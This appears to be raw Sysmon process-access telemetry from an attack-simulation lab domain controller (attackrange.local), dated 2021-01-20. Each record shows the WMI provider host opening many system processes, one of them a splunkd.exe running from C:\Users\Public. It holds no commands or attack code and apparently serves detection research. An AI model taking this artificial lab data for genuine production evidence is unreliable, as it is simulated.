15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024118Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024117Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024116Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024115Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024114Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024113Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024112Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024111Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024110Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024109Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024108Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024107Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024106Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024105Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024104Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024103Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024102Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024101Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024100Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024099Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 